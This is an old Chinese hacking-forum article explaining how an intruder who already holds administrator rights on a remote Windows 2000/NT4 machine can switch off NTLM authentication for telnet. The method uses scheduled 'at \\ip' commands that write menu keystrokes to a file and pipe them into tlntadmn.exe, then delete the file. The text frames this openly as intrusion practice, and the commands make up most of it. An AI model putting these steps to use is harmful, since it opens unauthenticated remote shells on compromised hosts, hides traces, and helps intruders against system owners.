为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 电脑技术 查看内容

不需任何工具:远程屏蔽telnet服务的ntlm认证

2004-9-29 20:05| 投稿: computer

摘要: 很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上...
很多人获得上传文件的权限和管理员权限以后想启动远程的tlelnet服务,但是却碰到讨厌的NTLM认证,对于这种情况,我们很多时候就采用上传文件(比如NTLM.exe),然后at远程定时执行,如果手头上没有这样的工具怎么办呢?可以这么做:大家可以看一下win2000和nt4自带tlntadmn这个命令,他是用来控制台修改telnet设置的,很可惜这是一个控制台的交互式工具,所以at命令没有办法直接调用。现在我们执行一下tlntadmn,然后按照以下的顺序操作停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)现在大家记住了吧,先后顺序是5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)线在我们这么做at \\ip time "echo 5 > c:\t.txt"at \\ip time "echo 3 >> c:\t.txt"at \\ip time "echo 7 >> c:\t.txt"at \\ip time "echo y >> c:\t.txt"at \\ip time "echo 0 >> c:\t.txt"at \\ip time "echo y >> c:\t.txt"at \\ip time "echo 0 >> c:\t.txt"at \\ip time "echo 4 >> c:\t.txt"at \\ip time "echo 0 >> c:\t.txt"at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"at \\ip time "del c:\t.txt /f"呵呵按照上面的顺序一步一步执行当然你本地做一个t.txt文件也可以,内容如下:537y0y040每个字符后面要加回车,然后copy t.txt \\ip\c$然后再at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\t.txt"at \\ip time "del c:\t.txt /f"很简单的dos重定向原理,t.txt就相当于手工输入一系列的操作,完成tlntadmn的交互呵呵 当然,你们可以在本地试验好以后再发到远程主机去我但是劝大家练习入侵的时候尽量不要使用工具,这样对自己没有帮助的

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部